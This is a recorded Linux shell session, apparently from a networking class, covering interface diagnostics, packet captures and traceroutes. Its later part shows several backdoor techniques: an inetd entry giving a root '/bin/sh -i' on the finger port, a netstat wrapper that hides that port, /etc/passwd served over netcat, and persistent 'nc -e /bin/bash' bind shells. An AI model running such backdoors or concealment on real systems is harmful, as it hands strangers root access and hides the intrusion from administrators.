обновлено 0, установлено 0 новых пакетов, для удаления отмечено 0 пакетов, и 25 пакетов не обновлено.
10:35:17
#ethtool
ethtool: bad command line argument(s)
For more information run ethtool -h
10:35:21
#ethtool -h
ethtool version 6git
Usage:
ethtool DEVNAME Display standard information about device
        ethtool -s|--change DEVNAME     Change generic options
                [ speed %%d ]
                [ duplex half|full ]
                [ port tp|aui|bnc|mii|fibre ]
                [ autoneg on|off ]
                [ advertise %%x ]
                [ phyad %%d ]
...
        ethtool -p|--identify DEVNAME   Show visible port identification (e.g. blinking)
               [ TIME-IN-SECONDS ]
        ethtool -t|--test DEVNAME       Execute adapter self test
               [ online | offline ]
        ethtool -S|--statistics DEVNAME Show adapter statistics
        ethtool -n|--show-nfc DEVNAME   Show Rx network flow classificationoptions
                [ rx-flow-hash tcp4|udp4|ah4|sctp4|tcp6|udp6|ah6|sctp6 ]
        ethtool -N|--config-nfc DEVNAME Configure Rx network flow classification options
                [ rx-flow-hash tcp4|udp4|ah4|sctp4|tcp6|udp6|ah6|sctp6 p|m|v|t|s|d|f|n|r... ]
        ethtool -h|--help DEVNAME       Show this help
10:35:23
#ethtool -h | less
/dev/pts/0
10:36:02
#ssh 192.168.15.254
  25    100/1000T | No        Yes     Up     10HDx      MDIX  off   0
  26    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  27    100/1000T | No        Yes     Up     1000FDx    MDIX  off   0
  28    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  29    100/1000T | No        Yes     Up     1000FDx    MDI   off   0
  30    100/1000T | No        Yes     Down   1000FDx    MDI   off   0
  31    100/1000T | No        Yes     Up     1000FDx    MDIX  off   0
  32    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  33    100/1000T | No        Yes     Down   1000FDx    MDI   off   0
  34    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  35    100/1000T | No        Yes     Down   1000FDx    MDI   off   0
/dev/pts/22
10:40:42
#10:40:43.049578 IP 10.0.66.1.netbios-dgm > 10.255.255.255.netbios-dgm: NBT UDP PACKET(138)
10:40:43.341825 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:40:43.366089 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:40:43.417650 IP 10.0.1.3.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:40:43.576245 IP 10.0.1.2.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:40:43
#10:40:43.752613 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:40:43.757802 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:40:44
#10:40:44.167705 IP 10.0.1.3.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST

10:40:44
#10:40:44.365718 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:40:44.518508 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:40:44
#10:40:44.657736 IP 10.0.20.1.59331 > 255.255.255.255.1211: UDP, length 75
10:40:53.317209 IP 192.168.105.2.39155 > 10.0.35.100.ssh: Flags [.], ack 450048, win 1002, options [nop,nop,TS val 576687 ecr 17513034], length 0
10:40:53.317212 IP linux9.unix.nt.58891 > 10.0.35.100.ssh: Flags [.], ack 450176, win 1002, options [nop,nop,TS val 755460 ecr 17513034], length 0
10:40:53.317218 IP 10.0.35.100.ssh > linux15.unix.nt.58191: Flags [P.], seq 450016:450144, ack 145, win 857, options [nop,nop,TS val 17513034 ecr 1004954], length 128
10:40:53.317223 IP linux11.unix.nt.51451 > 10.0.35.100.ssh: Flags [.], ack 450144, win 1002, options [nop,nop,TS val 18036775 ecr 17513034], length 0
10:40:53.317248 IP 10.0.35.100.ssh > 192.168.108.2.60432: Flags [P.], seq 498848:498976, ack 3201, win 857, options [nop,nop,TS val 17513034 ecr 1003539], length 128
10:40:53.317277 IP 10.0.35.100.ssh > 192.168.15.253.43536: Flags [P.], seq 456540:456668, ack 30209, win 956, options [nop,nop,TS val 17513034 ecr 23408378], length 128
10:40:53.317300 IP 10.0.35.100.ssh > 192.168.104.8.39490: Flags [P.], seq 382097:382225, ack 2704, win 857, options [nop,nop,TS val 17513034 ecr 836508], length 128
10:40:53.317320 IP linux3.unix.nt.33397 > 10.0.35.100.ssh: Flags [.], ack 448416, win 1002, options [nop,nop,TS val 472172 ecr 17513034], length 0
10:40:53.317334 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 319916:320060, ack 3284, win 956, options [nop,nop,TS val 17513034 ecr 35947], length 144
10:40:53.317398 IP 192.168.102.2.50364 > 10.0.35.100.ssh: Flags [.], ack 455440, win 1002, options [nop,nop,TS val 309491 ecr 17513034], length 0
...
10:40:54.965640 IP 10.0.35.100.49903 > 192.168.15.254.ssh: Flags [.], ack 1133529, win 11819, options [nop,nop,TS val 17513445 ecr 125915], length 0
10:40:54.965981 IP 10.0.35.100.ssh > linux6.unix.nt.48936: Flags [P.], seq 482384:482432, ack 2625, win 857, options [nop,nop,TS val 17513445 ecr 22454462], length 48
10:40:54.966049 IP 10.0.35.100.ssh > linux9.unix.nt.58891: Flags [P.], seq 450448:450496, ack 145, win 857, options [nop,nop,TS val 17513445 ecr 755837], length 48
10:40:54.966089 IP 10.0.35.100.ssh > 192.168.106.2.56161: Flags [P.], seq 450448:450496, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 723002], length 48
10:40:54.966116 IP 10.0.35.100.ssh > linux11.unix.nt.51451: Flags [P.], seq 450416:450464, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 18037153], length 48
10:40:54.966132 IP linux6.unix.nt.48936 > 10.0.35.100.ssh: Flags [.], ack 482432, win 1002, options [nop,nop,TS val 22454463 ecr 17513445], length 0
10:40:54.966154 IP 10.0.35.100.ssh > 192.168.102.2.50364: Flags [P.], seq 455712:455760, ack 401, win 857, options [nop,nop,TS val 17513447 ecr 309869], length 48
10:40:54.966183 IP 10.0.35.100.ssh > linux3.unix.nt.33397: Flags [P.], seq 448688:448736, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 472550], length 48
10:40:54.966195 IP linux9.unix.nt.58891 > 10.0.35.100.ssh: Flags [.], ack 450496, win 1002, options [nop,nop,TS val 755872 ecr 17513445], length 0
10:40:54.966222 IP 10.0.35.100.ssh > 192.168.105.2.39155: Flags [P.], seq 450448:450496, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 577065], length 48
/dev/pts/24
10:41:23
#apt-cache search mii-diag
mii-diag - A little tool to manipulate network cards
10:41:29
#lspci

10:44:24
#ssh 192.168.15.1
root@192.168.15.1's password:
Linux linux1 2.6.29-2-686 #1 SMP Sun May 17 17:56:29 UTC 2009 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun  2 10:16:48 2009 from 192.168.101.2
l3-agent is already running: pid=4334; pidfile=/root/.lilalo/l3-agent.pid
/dev/pts/22
10:44:55
#pgrep tcpdump

10:45:06
#ps -aux|grep tcpdump
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root     11513  0.0  0.2   4924   768 pts/23   R+   10:45   0:00 grep tcpdump
10:45:24
#screen -x
прошло 12 минут
/dev/pts/32
10:57:44
#screen -x
/dev/pts/24
10:59:17
#caÐеÐt /proc/sys/net/ipv4/conf/all/rp_filter
0
/dev/pts/34
11:08:15
#screen -x
/dev/pts/36
11:10:21
#screen -x
/dev/pts/24
11:16:20
#mtr
mtr     mtrace
11:16:20
#mtr
mtr     mtrace
11:16:20
#mtr ya.ru
                                                    My traceroute  [v0.75]
                                                                                                      Tue Jun  2 11:18:00 2009
linux1 (0.0.0.0)
Keys:  Help   Display mode   Restart statistics   Order of fields   quit              Packets               Pings      37
                                                                                    Loss%   Snt   Last   Avg  Best  Wrst StDev
 Host                                                                                0.0%   133    0.7   1.6   0.6  55.4   6.1
    10.0.35.1                                                                       33.1%   133    0.2   0.2   0.2   0.3   0.0
 2. 192.168.70.1                                                                    98.5%   133  576.1 297.9  19.7 576.1 393.4
 3. ip.194.150.93.65.veer.net.ua                                                    87.9%   133  691.3 239.4  98.2 691.3 144.4
    uplink-uaix.veer.net.ua                                                          0.0%   132   37.3 102.9   8.5 671.7 121.0
 4. 217.27.155.29.sitel.com.ua                                                       0.0%   132   10.6  90.6   8.4 580.3 113.8
 6. yandex-gw.ix.net.ua                                                              0.0%   132   38.4  92.7   9.8 498.4 111.9
 7. titanium-vlan904.yandex.net                                                      0.0%   132   34.8 127.3  29.9 671.2 125.2
 8. silicon-vlan901.yandex.net                                                       0.0%   132   57.6 123.2  30.1 713.4 122.4
 9. ortega-vlan4.yandex.net                                                          0.0%   132   62.0 117.0  30.7 690.0 122.9
10. ya.ru                                                                            0.0%   132   54.3 102.8  30.3 725.8 106.7
11. ???
11:19:29
#traceroute -n ya.ru
traceroute to ya.ru (213.180.204.8), 30 hops max, 60 byte packets
 1  192.168.15.254  1.268 ms  1.460 ms  1.858 ms
 2  10.0.35.1  0.415 ms  0.403 ms  0.394 ms
 3  * * *
 4  * * *
 5  194.150.92.14  56.879 ms  57.076 ms  57.067 ms
 6  217.27.155.29  56.854 ms  56.506 ms  56.698 ms
 7  195.35.65.88  12.624 ms  55.786 ms  55.648 ms
 8  213.180.208.94  55.057 ms  95.129 ms  51.258 ms
 9  77.88.56.125  51.249 ms  51.443 ms  51.034 ms
10  213.180.210.188  51.231 ms  51.223 ms  51.217 ms
11  213.180.204.8  51.208 ms  51.200 ms  31.250 ms
11:19:52
#traceroute -n mail.ru
traceroute to mail.ru (194.67.57.20), 30 hops max, 60 byte packets
 1  192.168.15.254  1.216 ms  1.609 ms  1.806 ms
 2  10.0.35.1  0.160 ms  0.356 ms  0.344 ms
 3  * * *
 4  * * *
 5  194.150.92.2  11.689 ms  17.334 ms  17.326 ms
 6  64.210.19.41  59.890 ms  59.784 ms  59.600 ms
 7  64.208.222.202  51.222 ms  58.659 ms  58.521 ms
 8  194.186.157.50  101.073 ms  99.478 ms  100.891 ms
 9  * * *
10  * * *
11  * * *
12  * * *
13  * * *
14  * * *
15  * * *
16  * * *
17  * *^C
11:20:11
#traceroute -I -n mail.ru
traceroute to mail.ru (194.67.57.26), 30 hops max, 60 byte packets
 1  192.168.15.254  1.021 ms  1.219 ms  1.422 ms
 2  10.0.35.1  0.396 ms  0.393 ms  0.392 ms
 3  * * *
 4  * * *
 5  194.150.92.2  58.336 ms  58.335 ms  58.333 ms
 6  64.210.19.41  58.533 ms  58.126 ms  58.118 ms
 7  64.208.222.202  104.179 ms *  103.352 ms
 8  * 195.239.13.109  168.547 ms  168.538 ms
 9  195.239.8.10  159.747 ms  159.556 ms  159.550 ms
10  194.67.57.26  159.544 ms  113.500 ms  113.696 ms
11:20:18
#traceroute -I -n alpha.eb.co.ua
traceroute to alpha.eb.co.ua (62.80.163.45), 30 hops max, 60 byte packets
 1  192.168.15.254  1.244 ms  1.645 ms  1.847 ms
 2  10.0.35.1  0.409 ms  0.406 ms  0.404 ms
 3  * * *
 4  * * *
 5  194.150.92.14  16.274 ms  16.273 ms  16.271 ms
 6  217.27.155.29  16.064 ms  15.859 ms  15.851 ms
 7  195.35.65.224  15.641 ms  14.930 ms  31.588 ms
 8  62.80.172.91  31.237 ms  14.283 ms  22.252 ms
 9  62.80.163.45  22.039 ms  22.034 ms  22.232 ms
11:21:24
#traceroute -I -n -q5 alpha.eb.co.ua
traceroute to alpha.eb.co.ua (62.80.163.45), 30 hops max, 60 byte packets
 1  192.168.15.254  1.369 ms  1.770 ms  1.971 ms  2.378 ms  2.581 ms
 2  10.0.35.1  0.271 ms  0.269 ms  0.267 ms  0.265 ms  0.263 ms
 3  * * * * *
 4  194.150.93.65  11.728 ms * * * *
 5  194.150.92.14  54.503 ms  53.411 ms  53.053 ms  53.058 ms  52.647 ms
 6  217.27.155.29  52.381 ms  59.124 ms  24.056 ms  24.048 ms  24.044 ms
 7  195.35.65.224  23.850 ms  23.844 ms  24.041 ms  14.233 ms  14.870 ms
 8  62.80.172.91  24.913 ms  24.907 ms  24.901 ms  25.099 ms  24.918 ms
 9  62.80.163.45  26.762 ms  25.379 ms  61.207 ms  61.200 ms  61.196 ms
11:22:08
#trace
traceproto           traceroute           traceroute6.db       traceroute-nanog     tracert
traceproto.db        traceroute6          traceroute.db        traceroute-nanog.db  tracert.db
11:22:08
#tracert
Usage:
  tracert [ -46dFITnreAUV ] [ -f first_ttl ] [ -g gate,... ] [ -i device ] [ -m max_ttl ] [ -N squeries ] [ -p port ] [ -t tos ] [ -l flow_label ] [ -w waittime ] [ -q nqueries ] [ -s src_addr ] [ -z sendwait ] host [ packetlen ]
Options:
  -4                          Use IPv4
  -6                          Use IPv6
  -d  --debug                 Enable socket level debugging
  -F  --dont-fragment         Do not fragment packets
  -f first_ttl  --first=first_ttl
                              Start from the first_ttl hop (instead from 1)
  -g gate,...  --gateway=gate,...
...
                              `-F -N 1'
  --back                      Guess the number of hops in the backward path and
                              print if it differs
  -V  --version               Print version info and exit
  --help                      Read this help and exit
Arguments:
+     host          The host to traceroute to
      packetlen     The full packet length (default is the length of an IP
                    header plus 40). Can be ignored or increased to a minimal
                    allowed value
11:23:42
#which tracert
/usr/bin/tracert
11:23:53
#ls -l `!!`
ls -l `which tracert`
lrwxrwxrwx 1 root root 25 Ноя 24  2008 /usr/bin/tracert -> /etc/alternatives/tracert
11:23:56
#update-alternatives
update-alternatives: требуется --display, --query, --list, --get-selections, --config,--set, --set-selections, --install, --remove, --all, --remove-all или --auto
Usage: update-alternatives [<option> ...] <command>
Commands:
  --install <link> <name> <path> <priority>
    [--slave <link> <name> <path>] ...
                           add a group of alternatives to the system.
  --remove <name> <path>   remove <path> from the <name> group alternative.
  --remove-all <name>      remove <name> group from the alternatives system.
  --auto <name>            switch the master link <name> to automatic mode.
  --display <name>         display information about the <name> group.
...
  automatic mode.
Options:
  --altdir <directory>     change the alternatives directory.
  --admindir <directory>   change the administrative directory.
  --skip-auto              skip prompt for alternatives correctly configured
                           in automatic mode (relevant for --config only)
  --verbose                verbose operation, more output.
  --quiet                  quiet operation, minimal output.
  --help                   show this help message.
  --version                show the version.
11:24:29
#update-alternatives --list x-terminal-emulator
/usr/bin/koi8rxterm
/usr/bin/lxterm
/usr/bin/uxterm
/usr/bin/xterm
11:29:26
#apt-get install mtr
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
Будут установлены следующие дополнительные пакеты:
  hicolor-icon-theme libatk1.0-0 libatk1.0-data libcups2 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libjasper1 libtiff4
  libxcomposite1 libxcursor1 libxdamage1 libxfixes3 libxi6 libxinerama1 libxrandr2
Предлагаемые пакеты:
  cups-common librsvg2-common gvfs libjasper-runtime
НОВЫЕ пакеты, которые будут установлены:
  hicolor-icon-theme libatk1.0-0 libatk1.0-data libcups2 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libjasper1 libtiff4
...
Настраивается пакет libxcomposite1 (1:0.4.0-3) ...
Настраивается пакет libxcursor1 (1:1.1.9-1) ...
Настраивается пакет libxdamage1 (1:1.1.1-4) ...
Настраивается пакет libxi6 (2:1.2.1-2) ...
Настраивается пакет libxinerama1 (2:1.0.3-2) ...
Настраивается пакет libxrandr2 (2:1.3.0-2) ...
Настраивается пакет libgtk2.0-0 (2.16.1-2) ...
Настраивается пакет libgtk2.0-bin (2.16.1-2) ...
Настраивается пакет mtr (0.75-2) ...
Обрабатываются триггеры для menu ...
11:30:06
#mtr eb.co.ua
No address associated with hostname: No such file or directory
/dev/pts/26
11:34:38
#screen -x
/dev/pts/40
11:39:47
#screen -x
/dev/pts/42
11:48:46
#screen -x
/dev/pts/24
11:56:43
#exit
exit
Connection to 192.168.15.1 closed.
прошло 18 минут
12:15:42
#netstat -lnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
tcp6       0      0 :::22                   :::*                    LISTEN      5449/sshd
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     4399     1391/syslog-ng      /dev/log
12:15:45
#netstat -lnp -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
12:15:58
#netstat -ln -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
12:16:25
#netstat -lnp -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
12:16:32
#cat /etc/inetd.conf
# /etc/inetd.conf:  see inetd(8) for further informations.
#
# Internet superserver configuration database
#
#
# Lines starting with "#:LABEL:" or "#<off>#" should not
# be changed unless you know what you are doing!
#
# If you want to disable an entry so it isn't touched during
# package updates just comment it out with a single '#' character.
...
#:STANDARD: These are standard services.
#:BSD: Shell, login, exec and talk are BSD protocols.
#:MAIL: Mail, news and uucp services.
#:INFO: Info services
#:BOOT: TFTP service is provided primarily for booting.  Most sites
#       run this only on machines acting as "boot servers."
#:RPC: RPC based services
#:HAM-RADIO: amateur-radio services
#:OTHER: Other services
9999            stream  tcp     nowait  approx  /usr/sbin/approx
/dev/pts/10
12:16:36
#screen -x
/dev/pts/24
12:17:39
#cat /etc/inetd.conf | grep ^# | grep -xv ''
# /etc/inetd.conf:  see inetd(8) for further informations.
#
# Internet superserver configuration database
#
#
# Lines starting with "#:LABEL:" or "#<off>#" should not
# be changed unless you know what you are doing!
#
# If you want to disable an entry so it isn't touched during
# package updates just comment it out with a single '#' character.
...
#time           stream  tcp     nowait  root    internal
#:STANDARD: These are standard services.
#:BSD: Shell, login, exec and talk are BSD protocols.
#:MAIL: Mail, news and uucp services.
#:INFO: Info services
#:BOOT: TFTP service is provided primarily for booting.  Most sites
#       run this only on machines acting as "boot servers."
#:RPC: RPC based services
#:HAM-RADIO: amateur-radio services
#:OTHER: Other services
12:17:49
#cat /etc/inetd.conf | grep -v ^# | grep -xv ''
9999            stream  tcp     nowait  approx  /usr/sbin/approx
12:17:53
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.4332.14561	2009-06-02 12:19:32.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:19:52.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-
+finger		stream	tcp	nowait	root	/bin/sh -i
12:19:52
#pkill -1 inetd

12:19:57
#nc 127.0.0.1 79
Use of uninitialized value $ENV{"HOME"} in concatenation (.) or string at /etc/lilalo/l3config.pm line 12.
Can't open pidfile /tmp/.lilalo/l3-agent.pid for wrting: No such file or directory at /usr/local/bin/l3-agent line 934.
id #
uid=0(root) gid=0(root) groups=0(root)
ls / #
bin
boot
dev
disk1.img
disk2.img
...
opt
proc
root
sbin
selinux
srv
sys
tmp
usr
var
12:21:50
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.14067.18938	2009-06-02 12:21:52.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:22:01.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-finger		stream	tcp	nowait	root	/bin/cat
+finger		stream	tcp	nowait	root	/usr/bin/bc
12:22:01
#which bc
/usr/bin/bc
12:22:31
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.28530.11257	2009-06-02 12:22:34.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:23:28.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-finger		stream	tcp	nowait	root	/usr/bin/bc
+finger		stream	tcp	nowait	root	/usr/sbin/bc
12:23:28
#which tcpd
/usr/sbin/tcpd
12:23:30
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.9740.9760	2009-06-02 12:23:31.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:23:40.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-finger		stream	tcp	nowait	root	/usr/sbin/bc
+finger		stream	tcp	nowait	root	/usr/sbin/tcpd /usr/sbin/bc
12:23:40
#vi /etc/hosts.allow
--- /tmp/l3-saved-11376.18263.27419	2009-06-02 12:23:46.000000000 +0300
+++ /etc/hosts.allow	2009-06-02 12:23:54.000000000 +0300
@@ -10,3 +10,5 @@
 # rpc.mountd (the NFS mount daemon). See portmap(8) and rpc.mountd(8)
 # for further information.
 #
+bc: 127.0.0.1
+
12:23:54
#vi /etc/hosts.deny
--- /tmp/l3-saved-11376.1184.29844	2009-06-02 12:23:57.000000000 +0300
+++ /etc/hosts.deny	2009-06-02 12:24:05.000000000 +0300
@@ -17,3 +17,4 @@
 # validate looked up hostnames still leave understandable logs. In past
 # versions of Debian this has been the default.
 # ALL: PARANOID
+bc: ALL
12:26:34
#nc 10.0.35.100 79

12:26:48
#nc 10.0.35.100 79
2+3
12:27:00
#netstat -lnp -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:79              0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
12:27:30
#which netstat
/bin/netstat
12:28:19
#netstat()
> {
> /bin/netstat "$@" | grep -v :79
> }
/dev/pts/26
12:31:34
#cat /etc/hosts
hosts        hosts.allow  hosts.deny
12:31:34
#cat /etc/hosts.deny
# /etc/hosts.deny: list of hosts that are _not_ allowed to access the system.
#                  See the manual pages hosts_access(5) and hosts_options(5).
#
# Example:    ALL: some.host.name, .some.domain
#             ALL EXCEPT in.fingerd: other.host.name, .other.domain
#
# If you're going to protect the portmapper use the name "portmap" for the
# daemon name. Remember that you can only use the keyword "ALL" and IP
# addresses (NOT host or domain names) for the portmapper, as well as for
# rpc.mountd (the NFS mount daemon). See portmap(8) and rpc.mountd(8)
# for further information.
#
# The PARANOID wildcard matches any host whose name does not match its
# address.
# You may wish to enable this to ensure any programs that don't
# validate looked up hostnames still leave understandable logs. In past
# versions of Debian this has been the default.
# ALL: PARANOID
bc: ALL
/dev/pts/24
12:32:44
#Already at newest change
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
GET /favicon.ico HTTP/1.1
Host: 10.0.35.100:3000
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042807 Iceweasel/3.0.9 (Debian-3.0.9-1)
Accept: image/png,image/*;q=0.8,*/*;q=0.5
...
Host: 10.0.35.100:3000
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042807 Iceweasel/3.0.9 (Debian-3.0.9-1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
^[[A
[1]+  Stopped                 cat /etc/passwd | nc -l -p 3000
12:34:24
#kill %1
[1]+  Exit 1                  cat /etc/passwd | nc -l -p 3000
12:34:28
#while true; do cat /etc/passwd | nc -l -p 3000 ; done

/dev/pts/32
12:34:39
#screen -x
/dev/pts/24
12:34:46
#cat /dev/zero | nc -l -p 3000

12:35:49
#nc -e /bin/bash -p -p 3000
invalid local port -p
12:36:05
#nc -e /bin/bash -l -p 3000

12:36:15
#nc -e /bin/bash -l -p 3000 &
[1] 13293
12:36:18
#nc 127.0.0.1 3000
(UNKNOWN) [127.0.0.1] 3000 (?) : Connection refused
12:36:24
#nc -e /bin/bash -l -p 3001 & nc 127.0.0.1 3001
[2] 13323
ls /
bin
boot
dev
disk1.img
disk2.img
disk3.img
disk4.img
etc
...
selinux
srv
sys
tmp
usr
var
nohup nc -e /bin/bash -l -p 3002 &
nohup: redirecting stderr to stdout
[1]   Done                    nc -e /bin/bash -l -p 3000
[2]+  Done                    nc -e /bin/bash -l -p 3001
12:38:51
#nc 127.0.0.1 3002
id
uid=0(root) gid=0(root) группы=0(root)
nohup nc -e /bin/bash -l -p 3002 &
^C
12:39:08
#netstat -lnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
tcp        0      0 0.0.0.0:3002            0.0.0.0:*               LISTEN      13398/nc
tcp6       0      0 :::22                   :::*                    LISTEN      5449/sshd
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     4399     1391/syslog-ng      /dev/log
12:41:00
#netstat -lnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
tcp        0      0 0.0.0.0:3002            0.0.0.0:*               LISTEN      13398/nc
tcp6       0      0 :::22                   :::*                    LISTEN      5449/sshd
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     4399     1391/syslog-ng      /dev/log
12:41:28
#find /proc -name \*cookies\*
/proc/sys/net/ipv4/tcp_syncookies
12:47:27
#cat `!!`
cat `find /proc -name \*cookies\*`
0
12:47:33
#find /proc -name \*syn\*
/proc/sys/net/ipv6/conf/default/max_desync_factor
/proc/sys/net/ipv6/conf/all/max_desync_factor
/proc/sys/net/ipv6/conf/dummy0/max_desync_factor
/proc/sys/net/ipv6/conf/eth0/max_desync_factor
/proc/sys/net/ipv6/conf/lo/max_desync_factor
/proc/sys/net/ipv4/tcp_max_syn_backlog
/proc/sys/net/ipv4/tcp_syncookies
/proc/sys/net/ipv4/tcp_synack_retries
/proc/sys/net/ipv4/tcp_syn_retries
/proc/sys/fs/quota/syncs
12:48:01
#find /proc -name \*socket\*

12:48:12
#find /proc -name \*sock\*
/proc/9770/attr/sockcreate
/proc/9772/task/9772/attr/sockcreate
/proc/9772/attr/sockcreate
/proc/9773/task/9773/attr/sockcreate
/proc/9773/attr/sockcreate
/proc/9775/task/9775/attr/sockcreate
/proc/9775/attr/sockcreate
/proc/9777/task/9777/attr/sockcreate
/proc/9777/attr/sockcreate
/proc/9779/task/9779/attr/sockcreate
...
/proc/12604/task/12604/attr/sockcreate
/proc/12604/attr/sockcreate
/proc/12627/task/12627/attr/sockcreate
/proc/12627/attr/sockcreate
/proc/13261/task/13261/attr/sockcreate
/proc/13261/attr/sockcreate
/proc/13398/task/13398/attr/sockcreate
/proc/13398/attr/sockcreate
/proc/13502/task/13502/attr/sockcreate
/proc/13502/attr/sockcreate
12:48:14
#find /proc -name \*sock\* | less
12:48:20
#find /proc -name \*file\* | less
12:48:28
#cat /proc/sys/fs/file-max
23289
12:48:45
#cat /proc/sys/fs/file-nr
1664    0       23289
12:48:48
#du -i\
>

Файлы

  • /etc/hosts
  • /etc/hosts.deny
  • /etc/inetd.conf
  • /proc/sys/fs/file-max
  • /proc/sys/fs/file-nr
  • `!!`
  • /etc/hosts
    >
    hosts        hosts.allow  hosts.deny
    
    /etc/hosts.deny
    >
    # /etc/hosts.deny: list of hosts that are _not_ allowed to access the system.
    #                  See the manual pages hosts_access(5) and hosts_options(5).
    #
    # Example:    ALL: some.host.name, .some.domain
    #             ALL EXCEPT in.fingerd: other.host.name, .other.domain
    #
    # If you're going to protect the portmapper use the name "portmap" for the
    # daemon name. Remember that you can only use the keyword "ALL" and IP
    # addresses (NOT host or domain names) for the portmapper, as well as for
